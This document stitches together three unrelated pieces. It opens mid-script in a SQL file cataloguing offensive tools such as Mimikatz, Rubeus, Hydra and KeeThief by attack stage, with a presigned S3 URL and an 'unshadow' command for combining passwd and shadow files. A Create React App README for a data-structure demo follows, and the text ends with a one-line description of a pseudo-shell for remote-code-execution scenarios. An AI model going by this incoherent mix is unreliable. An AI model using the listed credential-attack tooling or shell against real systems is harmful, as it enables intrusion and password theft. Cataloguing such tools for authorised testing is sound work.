'https://snort-org-site.s3.amazonaws.com/production/document_files/files/000/000/249/original/snort_manual.pdf?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIXACIED2SPMSC7GA%2F20210128%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20210128T192737Z&X-Amz-Expires=172800&X-Amz-SignedHeaders=host&X-Amz-Signature=4b51dc730677d14203c4a4cde25c1831ac64e9eca8df89c6737701811fa3f9fd', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('GoBuster', 'Enum', 'A fuzzer for websites', 'man pages on linux', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hydra', 'Exploit', 'Brutforcer for wesite passwords', 'man pages on linux', 'Brute', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Mimikatz', 'Post', 'Used to exploit kerberos', 'https://gist.github.com/insi2304/484a4e92941b437bad961fcacda82d49', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Impacket', 'Exploit', 'The fascilitator of python bassed script that uses modules for attacking windows ', 'https://www.secureauth.com/labs-old/impacket/', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Enum4Linux', 'Enum', 'for Enumerating Windows and Samba hosts', 'man pages included, https://tools.kali.org/information-gathering/enum4linux', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Rubeus', 'Exploit', 'Used for kerberos interaction and abuse', 'https://github.com/GhostPack/Rubeus', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Kerbrute', 'Enum, Exploit', 'quickly enumerate and brutforce active directory accounts through kerberos pre-authentication', 'https://github.com/ropnop/kerbrute/', 'Brute', 'Windows', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('John the Ripper', 'Exploit', 'a password brutforcer', 'https://www.openwall.com/john/doc/', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hashcat', 'Exploit', 'A password bruteforces', 'http://manpages.org/hashcat', 'Brute', 'Hash', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Bloodhound', 'Enum', 'Network mapping tool', 'https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-with-bloodhound-on-kali-linux', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Wireshark', 'Utility', 'Packet sniffer', 'https://www.wireshark.org/download/docs/user-guide.pdf', 'Sniffing', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hash-Identifier', 'Utility', '(superseeded by Name-That-Hash)A simple python program for identifying hashes', 'man pages on linux', NULL, 'Hash', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Scp', 'Utility', 'For transfering files over SSH connection', 'man pages on llinux', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBClient', 'Utility', 'Used to connect to SMB file shares, can be used to enumerate shares', 'man pages on linux', 'Connect', 'SMB', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PowerShell', 'Utility', 'Powerfull comand line for Windows', 'https://www.pdq.com/powershell/', NULL, 'Windows', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Searchsploit', 'Enum', 'Local version of ExploitDB', 'https://www.exploit-db.com/searchsploit', 'Exploit Enum', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Vim', 'Utiility', 'Text editor', 'https://vimhelp.org/', NULL, 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('LinPeas', 'Post', 'For Enumerating Linux computers', 'Simply run on a linux computer', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Nikto', 'Enum', 'For full enumeration on websites', 'https://cirt.net/nikto2-docs/', 'Exploit Enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Radare2', 'Utility', 'A tooll used to reverse engineer programs', 'https://github.com/radareorg/radare2/blob/master/doc/intro.md', 'Reverse', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Evil-WinRM', 'Exploit', 'Malware exuivilent of WinRM and used to exploit windows systems', 'https://github.com/Hackplayers/evil-winrm', NULL, 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Seatbelt', 'Post', 'Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives', 'https://github.com/GhostPack/Seatbelt', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WinPeas', 'Post', 'For full enumeration of windows host (internal)', 'https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS', 'Exploit Enum', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Lockless', 'Post', 'LockLess is a C# tool that allows for the enumeration of open file handles and the copying of locked files', 'https://github.com/GhostPack/Lockless', 'File interaction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SQLMap', 'Exploit', 'Automates the process of detecting and exploiting SQL injection flaws and taking over of database servers', 'http://sqlmap.org/', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('KEETheif', 'Post', 'Allows for the extraction of KeePass 2.X key material from memory, as well as the backdooring and enumeration of the KeePass trigger system', 'https://github.com/GhostPack/KeeThief', 'File interacction', 'Windows', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('TheHarvester', 'Enum', 'The objective of this program is to gather emails, subdomains, hosts, employee names, open ports and banners from different public sources like search engines, PGP key servers and SHODAN computer database', 'https://tools.kali.org/information-gathering/theharvester', NULL, 'N/A', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('jSQLInjection', 'Enum', 'used for gathering SQL databse information form a distant source', 'https://tools.kali.org/vulnerability-analysis/jsql', 'SQLi', 'SQL', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Hping', 'Enum', 'Ping command on steroids, used to enumerating firewalls', 'https://tools.kali.org/information-gathering/hping3', 'Scanning', 'All', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux Exploit Suggester', 'Post', 'keeps track of vulnerabilities and suggests exploits to gain root access', 'https://tools.kali.org/exploitation-tools/linux-exploit-suggester', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unix-PrivEsc-Check', 'Post', ' It tries to find misconfigurations that could allow local unprivileged users to escalate privileges to other users or to access local apps, written in a single shell script so is easy to upload', 'https://tools.kali.org/vulnerability-analysis/unix-privesc-check', 'Exploit Enum', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Dotdotpwn', 'Enum', 'It’s a very flexible intelligent fuzzer to discover traversal directory vulnerabilities in software such as HTTP/FTP/TFTP servers', 'https://tools.kali.org/information-gathering/dotdotpwn', 'Fuzzing', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Websploit', 'Enum, Exploit', 'Swiss-army-knife of web exploits ranging from social engineering to honeypots and everything in between', 'https://tools.kali.org/web-applications/websploit', NULL, 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('XSSer', 'Enum', 'To detect, exploit and report XSS vulnerabilities in web-based applications', 'https://tools.kali.org/web-applications/xsser', 'Exploit enum', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Name-That-Hash', 'Utility', 'Hash-identifier with more deatils and command line based', 'https://github.com/HashPals/Name-That-Hash', NULL, 'N/A', 'N', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('SMBMap', 'Enum', 'enumerate shares over a domin', 'https://tools.kali.org/information-gathering/smbmap', 'Scanning', 'OS', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Redis-Cli', 'Exploit', 'used for interacting and exploiting reddis-cli on port 6379', 'https://book.hacktricks.xyz/pentesting/6379-pentesting-redis ; https://redis.io/topics/rediscli', 'SQL', 'SQL', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Unshadow', 'POST', 'Combining passwd and shadow files into 1', 'simply use: unshadow <passwd file> <shadow file> > <output file>', 'Passwords', 'Hash', 'Y', 'y'); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('WPScan', 'Enum', 'Look for vulnerabilities in wordpress site', 'https://github.com/wpscanteam/wpscan', 'Scanning', 'Web', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Netcat', 'Utility', 'used for connecting 2 computers', 'https://www.win.tue.nl/~aeb/linux/hh/netcat_tutorial.pdf', 'Connect', 'N/A', 'N', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('Linux commands', 'Post', 'Linux commands used for Priv esc', 'https://gtfobins.github.io, https://wadcoms.github.io', 'Priv Esc', 'Linux', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CrackMapExec', 'Enum,, Exploit', 'Swis army knife of network testing', 'https://ptestmethod.readthedocs.io/en/latest/cme.html', 'Scanning, Exploit', 'Networks', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('IKE-Scan', 'Enum', 'Used to dicover, fingerprint and test IPsec VPN systems', 'http://www.nta-monitor.com/wiki/index.php/Ike-scan_User_Guide', 'Scanning', 'VPN', NULL, NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('PSK-Crack', 'Exploit', 'attempts to crack IKE Aggressive Mode pre-shared keys that have previously been gathered using ike-scan with the --pskcrack option', 'https://linux.die.net/man/1/psk-crack', 'Connect, Brute', 'Wifi', 'Y', NULL); INSERT INTO Programs (Name, Stage, Description, Info, Features, Target, Offensive, commands) VALUES ('CeWL', 'Enum', 'spiders a given url returning a wordlist that is intednded for cracking passwords', 'https://tools.kali.org/password-attacks/cewl', 'Brute', 'Web', 'Y', NULL); COMMIT TRANSACTION; PRAGMA foreign_keys = on;

# big-o-performance A simple html app to demonstrate performance costs of data structures. - Clone the project - Navigate to the root of the project in a termina or command prompt - Run 'npm install' - Run 'npm start' - Go to the URL specified in the terminal or command prompt to try out the app. # This app was created from the Create React App NPM. Below are instructions from that project. Below you will find some information on how to perform common tasks. You can find the most recent version of this guide [here](https://github.com/facebookincubator/create-react-app/blob/master/template/README.md). ## Table of Contents - [Updating to New Releases](#updating-to-new-releases) - [Sending Feedback](#sending-feedback) - [Folder Structure](#folder-structure) - [Available Scripts](#available-scripts) - [npm start](#npm-start) - [npm run build](#npm-run-build) - [npm run eject](#npm-run-eject) - [Displaying Lint Output in the Editor](#displaying-lint-output-in-the-editor) - [Installing a Dependency](#installing-a-dependency) - [Importing a Component](#importing-a-component) - [Adding a Stylesheet](#adding-a-stylesheet) - [Post-Processing CSS](#post-processing-css) - [Adding Images and Fonts](#adding-images-and-fonts) - [Adding Bootstrap](#adding-bootstrap) - [Adding Flow](#adding-flow) - [Adding Custom Environment Variables](#adding-custom-environment-variables) - [Integrating with a Node Backend](#integrating-with-a-node-backend) - [Proxying API Requests in Development](#proxying-api-requests-in-development) - [Deployment](#deployment) - [Now](#now) - [Heroku](#heroku) - [Surge](#surge) - [GitHub Pages](#github-pages) - [Something Missing?](#something-missing) ## Updating to New Releases Create React App is divided into two packages: * `create-react-app` is a global command-line utility that you use to create new projects. * `react-scripts` is a development dependency in the generated projects (including this one). You almost never need to update `create-react-app` itself: it’s delegates all the setup to `react-scripts`. When you run `create-react-app`, it always creates the project with the latest version of `react-scripts` so you’ll get all the new features and improvements in newly created apps automatically. To update an existing project to a new version of `react-scripts`, [open the changelog](https://github.com/facebookincubator/create-react-app/blob/master/CHANGELOG.md), find the version you’re currently on (check `package.json` in this folder if you’re not sure), and apply the migration instructions for the newer versions. In most cases bumping the `react-scripts` version in `package.json` and running `npm install` in this folder should be enough, but it’s good to consult the [changelog](https://github.com/facebookincubator/create-react-app/blob/master/CHANGELOG.md) for potential breaking changes. We commit to keeping the breaking changes minimal so you can upgrade `react-scripts` painlessly. ## Sending Feedback We are always open to [your feedback](https://github.com/facebookincubator/create-react-app/issues). ## Folder Structure After creation, your project should look like this: ``` my-app/ README.md index.html favicon.ico node_modules/ package.json src/ App.css App.js index.css index.js logo.svg ``` For the project to build, **these files must exist with exact filenames**: * `index.html` is the page template; * `favicon.ico` is the icon you see in the browser tab; * `src/index.js` is the JavaScript entry point. You can delete or rename the other files. You may create subdirectories inside `src`. For faster rebuilds, only files inside `src` are processed by Webpack. You need to **put any JS and CSS files inside `src`**, or Webpack won’t see them. You can, however, create more top-level directories. They will not be included in the production build so you can use them for things like documentation. ## Available Scripts In the project directory, you can run: ### `npm start` Runs the app in the development mode.<br> Open [http://localhost:3000](http://localhost:3000) to view it in the browser. The page will reload if you make edits.<br> You will also see any lint errors in the console. ### `npm run build` Builds the app for production to the `build` folder.<br> It correctly bundles React in production mode and optimizes the build for the best performance. The build is minified and the filenames include the hashes.<br> Your app is ready to be deployed! ### `npm run eject` **Note: this is a one-way operation. Once you `eject`, you can’t go back!** If you aren’t satisfied with the build tool and configuration choices, you can `eject` at any time. This command will remove the single build dependency from your project. Instead, it will copy all the configuration files and the transitive dependencies (Webpack, Babel, ESLint, etc) right into your project so you have full control over them. All of the commands except `eject` will still work, but they will point to the copied scripts so you can tweak them. At this point you’re on your own. You don’t have to ever use `eject`. The curated feature set is suitable for small and middle deployments, and you shouldn’t feel obligated to use this feature. However we understand that this tool wouldn’t be useful if you couldn’t customize it when you are ready for it. ## Displaying Lint Output in the Editor >Note: this feature is available with `react-scripts@0.2.0` and higher. Some editors, including Sublime Text, Atom, and Visual Studio Code, provide plugins for ESLint. They are not required for linting. You should see the linter output right in your terminal as well as the browser console. However, if you prefer the lint results to appear right in your editor, there are some extra steps you can do. You would need to install an ESLint plugin for your editor first. >**A note for Atom `linter-eslint` users** >If you are using the Atom `linter-eslint` plugin, make sure that **Use global ESLint installation** option is checked: ><img src="http://i.imgur.com/yVNNHJM.png" width="300"> Then make sure `package.json` of your project ends with this block: ```js { // ... "eslintConfig": { "extends": "./node_modules/react-scripts/config/eslint.js" } } ``` Projects generated with `react-scripts@0.2.0` and higher should already have it. If you don’t need ESLint integration with your editor, you can safely delete those three lines from your `package.json`. Finally, you will need to install some packages *globally*: ```sh npm install -g eslint babel-eslint eslint-plugin-react eslint-plugin-import eslint-plugin-jsx-a11y eslint-plugin-flowtype ``` We recognize that this is suboptimal, but it is currently required due to the way we hide the ESLint dependency. The ESLint team is already [working on a solution to this](https://github.com/eslint/eslint/issues/3458) so this may become unnecessary in a couple of months. ## Installing a Dependency The generated project includes React and ReactDOM as dependencies. It also includes a set of scripts used by Create React App as a development dependency. You may install other dependencies (for example, React Router) with `npm`: ``` npm install --save <library-name> ``` ## Importing a Component This project setup supports ES6 modules thanks to Babel. While you can still use `require()` and `module.exports`, we encourage you to use [`import` and `export`](http://exploringjs.com/es6/ch_modules.html) instead. For example: ### `Button.js` ```js import React, { Component } from 'react'; class Button extends Component { render() { // ... } } export default Button; // Don’t forget to use export default! ``` ### `DangerButton.js` ```js import React, { Component } from 'react'; import Button from './Button'; // Import a component from another file class DangerButton extends Component { render() { return <Button color="red" />; } } export default DangerButton; ``` Be aware of the [difference between default and named exports](http://stackoverflow.com/questions/36795819/react-native-es-6-when-should-i-use-curly-braces-for-import/36796281#36796281). It is a common source of mistakes. We suggest that you stick to using default imports and exports when a module only exports a single thing (for example, a component). That’s what you get when you use `export default Button` and `import Button from './Button'`. Named exports are useful for utility modules that export several functions. A module may have at most one default export and as many named exports as you like. Learn more about ES6 modules: * [When to use the curly braces?](http://stackoverflow.com/questions/36795819/react-native-es-6-when-should-i-use-curly-braces-for-import/36796281#36796281) * [Exploring ES6: Modules](http://exploringjs.com/es6/ch_modules.html) * [Understanding ES6: Modules](https://leanpub.com/understandinges6/read#leanpub-auto-encapsulating-code-with-modules) ## Adding a Stylesheet This project setup uses [Webpack](https://webpack.github.io/) for handling all assets. Webpack offers a custom way of “extending” the concept of `import` beyond JavaScript. To express that a JavaScript file depends on a CSS file, you need to **import the CSS from the JavaScript file**: ### `Button.css` ```css .Button { padding: 20px; } ``` ### `Button.js` ```js import React, { Component } from 'react'; import './Button.css'; // Tell Webpack that Button.js uses these styles class Button extends Component { render() { // You can use them as regular CSS styles return <div className="Button" />; } } ``` **This is not required for React** but many people find this feature convenient. You can read about the benefits of this approach [here](https://medium.com/seek-ui-engineering/block-element-modifying-your-javascript-components-d7f99fcab52b). However you should be aware that this makes your code less portable to other build tools and environments than Webpack. In development, expressing dependencies this way allows your styles to be reloaded on the fly as you edit them. In production, all CSS files will be concatenated into a single minified `.css` file in the build output. If you are concerned about using Webpack-specific semantics, you can put all your CSS right into `src/index.css`. It would still be imported from `src/index.js`, but you could always remove that import if you later migrate to a different build tool. ## Post-Processing CSS This project setup minifies your CSS and adds vendor prefixes to it automatically through [Autoprefixer](https://github.com/postcss/autoprefixer) so you don’t need to worry about it. For example, this: ```css .App { display: flex; flex-direction: row; align-items: center; } ``` becomes this: ```css .App { display: -webkit-box; display: -ms-flexbox; display: flex; -webkit-box-orient: horizontal; -webkit-box-direction: normal; -ms-flex-direction: row; flex-direction: row; -webkit-box-align: center; -ms-flex-align: center; align-items: center; } ``` There is currently no support for preprocessors such as Less, or for sharing variables across CSS files. ## Adding Images and Fonts With Webpack, using static assets like images and fonts works similarly to CSS. You can **`import` an image right in a JavaScript module**. This tells Webpack to include that image in the bundle. Unlike CSS imports, importing an image or a font gives you a string value. This value is the final image path you can reference in your code. Here is an example: ```js import React from 'react'; import logo from './logo.png'; // Tell Webpack this JS file uses this image console.log(logo); // /logo.84287d09.png function Header() { // Import result is the URL of your image return <img src={logo} alt="Logo" />; } export default function Header; ``` This works in CSS too: ```css .Logo { background-image: url(./logo.png); } ``` Webpack finds all relative module references in CSS (they start with `./`) and replaces them with the final paths from the compiled bundle. If you make a typo or accidentally delete an important file, you will see a compilation error, just like when you import a non-existent JavaScript module. The final filenames in the compiled bundle are generated by Webpack from content hashes. If the file content changes in the future, Webpack will give it a different name in production so you don’t need to worry about long-term caching of assets. Please be advised that this is also a custom feature of Webpack. **It is not required for React** but many people enjoy it (and React Native uses a similar mechanism for images). However it may not be portable to some other environments, such as Node.js and Browserify. If you prefer to reference static assets in a more traditional way outside the module system, please let us know [in this issue](https://github.com/facebookincubator/create-react-app/issues/28), and we will consider support for this. ## Adding Bootstrap You don’t have to use [React Bootstrap](https://react-bootstrap.github.io) together with React but it is a popular library for integrating Bootstrap with React apps. If you need it, you can integrate it with Create React App by following these steps: Install React Bootstrap and Bootstrap from NPM. React Bootstrap does not include Bootstrap CSS so this needs to be installed as well: ``` npm install react-bootstrap --save npm install bootstrap@3 --save ``` Import Bootstrap CSS and optionally Bootstrap theme CSS in the ```src/index.js``` file: ```js import 'bootstrap/dist/css/bootstrap.css'; import 'bootstrap/dist/css/bootstrap-theme.css'; ``` Import required React Bootstrap components within ```src/App.js``` file or your custom component files: ```js import { Navbar, Jumbotron, Button } from 'react-bootstrap'; ``` Now you are ready to use the imported React Bootstrap components within your component hierarchy defined in the render method. Here is an example [`App.js`](https://gist.githubusercontent.com/gaearon/85d8c067f6af1e56277c82d19fd4da7b/raw/6158dd991b67284e9fc8d70b9d973efe87659d72/App.js) redone using React Bootstrap. ## Adding Flow Flow typing is currently [not supported out of the box](https://github.com/facebookincubator/create-react-app/issues/72) with the default `.flowconfig` generated by Flow. If you run it, you might get errors like this: ```js node_modules/fbjs/lib/Deferred.js.flow:60 60: Promise.prototype.done.apply(this._promise, arguments); ^^^^ property `done`. Property not found in 495: declare class Promise<+R> { ^ Promise. See lib: /private/tmp/flow/flowlib_34952d31/core.js:495 node_modules/fbjs/lib/shallowEqual.js.flow:29 29: return x !== 0 || 1 / (x: $FlowIssue) === 1 / (y: $FlowIssue); ^^^^^^^^^^ identifier `$FlowIssue`. Could not resolve name src/App.js:3 3: import logo from './logo.svg'; ^^^^^^^^^^^^ ./logo.svg. Required module not found src/App.js:4 4: import './App.css'; ^^^^^^^^^^^ ./App.css. Required module not found src/index.js:5 5: import './index.css'; ^^^^^^^^^^^^^ ./index.css. Required module not found ``` To fix this, change your `.flowconfig` to look like this: ```ini [libs] ./node_modules/fbjs/flow/lib [options] esproposal.class_static_fields=enable esproposal.class_instance_fields=enable module.name_mapper='^\(.*\)\.css$' -> 'react-scripts/config/flow/css' module.name_mapper='^\(.*\)\.\(jpg\|png\|gif\|eot\|otf\|webp\|svg\|ttf\|woff\|woff2\|mp4\|webm\)$' -> 'react-scripts/config/flow/file' suppress_type=$FlowIssue suppress_type=$FlowFixMe ``` Re-run flow, and you shouldn’t get any extra issues. If you later `eject`, you’ll need to replace `react-scripts` references with the `<PROJECT_ROOT>` placeholder, for example: ```ini module.name_mapper='^\(.*\)\.css$' -> '<PROJECT_ROOT>/config/flow/css' module.name_mapper='^\(.*\)\.\(jpg\|png\|gif\|eot\|otf\|webp\|svg\|ttf\|woff\|woff2\|mp4\|webm\)$' -> '<PROJECT_ROOT>/config/flow/file' ``` We will consider integrating more tightly with Flow in the future so that you don’t have to do this. ## Adding Custom Environment Variables >Note: this feature is available with `react-scripts@0.2.3` and higher. Your project can consume variables declared in your environment as if they were declared locally in your JS files. By default you will have `NODE_ENV` defined for you, and any other environment variables starting with `REACT_APP_`. These environment variables will be defined for you on `process.env`. For example, having an environment variable named `REACT_APP_SECRET_CODE` will be exposed in your JS as `process.env.REACT_APP_SECRET_CODE`, in addition to `process.env.NODE_ENV`. These environment variables can be useful for displaying information conditionally based on where the project is deployed or consuming sensitive data that lives outside of version control. First, you need to have environment variables defined, which can vary between OSes. For example, let's say you wanted to consume a secret defined in the environment inside a `<form>`: ```jsx render() { return ( <div> <small>You are running this application in <b>{process.env.NODE_ENV}</b> mode.</small> <form> <input type="hidden" defaultValue={process.env.REACT_APP_SECRET_CODE} /> </form> </div> ); } ``` The above form is looking for a variable called `REACT_APP_SECRET_CODE` from the environment. In order to consume this value, we need to have it defined in the environment: ### Windows (cmd.exe) ```cmd set REACT_APP_SECRET_CODE=abcdef&&npm start ``` (Note: the lack of whitespace is intentional.) ### Linux, OS X (Bash) ```bash REACT_APP_SECRET_CODE=abcdef npm start ``` > Note: Defining environment variables in this manner is temporary for the life of the shell session. Setting permanent environment variables is outside the scope of these docs. With our environment variable defined, we start the app and consume the values. Remember that the `NODE_ENV` variable will be set for you automatically. When you load the app in the browser and inspect the `<input>`, you will see its value set to `abcdef`, and the bold text will show the environment provided when using `npm start`: ```html <div> <small>You are running this application in <b>development</b> mode.</small> <form> <input type="hidden" value="abcdef" /> </form> </div> ``` Having access to the `NODE_ENV` is also useful for performing actions conditionally: ```js if (process.env.NODE_ENV !== 'production') { analytics.disable(); } ``` ## Integrating with a Node Backend Check out [this tutorial](https://www.fullstackreact.com/articles/using-create-react-app-with-a-server/) for instructions on integrating an app with a Node backend running on another port, and using `fetch()` to access it. You can find the companion GitHub repository [here](https://github.com/fullstackreact/food-lookup-demo). ## Proxying API Requests in Development >Note: this feature is available with `react-scripts@0.2.3` and higher. People often serve the front-end React app from the same host and port as their backend implementation. For example, a production setup might look like this after the app is deployed: ``` / - static server returns index.html with React app /todos - static server returns index.html with React app /api/todos - server handles any /api/* requests using the backend implementation ``` Such setup is **not** required. However, if you **do** have a setup like this, it is convenient to write requests like `fetch('/api/todos')` without worrying about redirecting them to another host or port during development. To tell the development server to proxy any unknown requests to your API server in development, add a `proxy` field to your `package.json`, for example: ```js "proxy": "http://localhost:4000", ``` This way, when you `fetch('/api/todos')` in development, the development server will recognize that it’s not a static asset, and will proxy your request to `http://localhost:4000/api/todos` as a fallback. Conveniently, this avoids [CORS issues](http://stackoverflow.com/questions/21854516/understanding-ajax-cors-and-security-considerations) and error messages like this in development: ``` Fetch API cannot load http://localhost:4000/api/todos. No 'Access-Control-Allow-Origin' header is present on the requested resource. Origin 'http://localhost:3000' is therefore not allowed access. If an opaque response serves your needs, set the request's mode to 'no-cors' to fetch the resource with CORS disabled. ``` Keep in mind that `proxy` only has effect in development (with `npm start`), and it is up to you to ensure that URLs like `/api/todos` point to the right thing in production. You don’t have to use the `/api` prefix. Any unrecognized request will be redirected to the specified `proxy`. Currently the `proxy` option only handles HTTP requests, and it won’t proxy WebSocket connections. If the `proxy` option is **not** flexible enough for you, alternatively you can: * Enable CORS on your server ([here’s how to do it for Express](http://enable-cors.org/server_expressjs.html)). * Use [environment variables](#adding-custom-environment-variables) to inject the right server host and port into your app. ## Deployment By default, Create React App produces a build assuming your app is hosted at the server root. To override this, specify the `homepage` in your `package.json`, for example: ```js "homepage": "http://mywebsite.com/relativepath", ``` This will let Create React App correctly infer the root path to use in the generated HTML file. ### Now See [this example](https://github.com/xkawi/create-react-app-now) for a zero-configuration single-command deployment with [now](https://zeit.co/now). ### Heroku Use the [Heroku Buildpack for Create React App](https://github.com/mars/create-react-app-buildpack). You can find instructions in [Deploying React with Zero Configuration](https://blog.heroku.com/deploying-react-with-zero-configuration). ### Surge Install the Surge CLI if you haven't already by running `npm install -g surge`. Run the `surge` command and log in you or create a new account. You just need to specify the *build* folder and your custom domain, and you are done. ```sh email: email@domain.com password: ******** project path: /path/to/project/build size: 7 files, 1.8 MB domain: create-react-app.surge.sh upload: [====================] 100%, eta: 0.0s propagate on CDN: [====================] 100% plan: Free users: email@domain.com IP Address: X.X.X.X Success! Project is published and running at create-react-app.surge.sh ``` Note that in order to support routers that use html5 `pushState` API, you may want to rename the `index.html` in your build folder to `200.html` before deploying to Surge. This [ensures that every URL falls back to that file](https://surge.sh/help/adding-a-200-page-for-client-side-routing). ### GitHub Pages >Note: this feature is available with `react-scripts@0.2.0` and higher. Open your `package.json` and add a `homepage` field: ```js "homepage": "http://myusername.github.io/my-app", ``` **The above step is important!** Create React App uses the `homepage` field to determine the root URL in the built HTML file. Now, whenever you run `npm run build`, you will see a cheat sheet with a sequence of commands to deploy to GitHub pages: ```sh git commit -am "Save local changes" git checkout -B gh-pages git add -f build git commit -am "Rebuild website" git filter-branch -f --prune-empty --subdirectory-filter build git push -f origin gh-pages git checkout - ``` You may copy and paste them, or put them into a custom shell script. You may also customize them for another hosting provider. Note that GitHub Pages doesn't support routers that use the HTML5 `pushState` history API under the hood (for example, React Router using `browserHistory`). This is because when there is a fresh page load for a url like `http://user.github.io/todomvc/todos/42`, where `/todos/42` is a frontend route, the GitHub Pages server returns 404 because it knows nothing of `/todos/42`. If you want to add a router to a project hosted on GitHub Pages, here are a couple of solutions: * You could switch from using HTML5 history API to routing with hashes. If you use React Router, you can switch to `hashHistory` for this effect, but the URL will be longer and more verbose (for example, `http://user.github.io/todomvc/#/todos/42?_k=yknaj`). [Read more](https://github.com/reactjs/react-router/blob/master/docs/guides/Histories.md#histories) about different history implementations in React Router. * Alternatively, you can use a trick to teach GitHub Pages to handle 404 by redirecting to your `index.html` page with a special redirect parameter. You would need to add a `404.html` file with the redirection code to the `build` folder before deploying your project, and you’ll need to add code handling the redirect parameter to `index.html`. You can find a detailed explanation of this technique [in this guide](https://github.com/rafrex/spa-github-pages). ## Something Missing? If you have ideas for more “How To” recipes that should be on this page, [let us know](https://github.com/facebookincubator/create-react-app/issues) or [contribute some!](https://github.com/facebookincubator/create-react-app/edit/master/template/README.md)

Pseudo-shell for RCE scenarios: tunnels commands via /tmp sockets to a local daemon, keeps context, no bind or reverse shell needed.

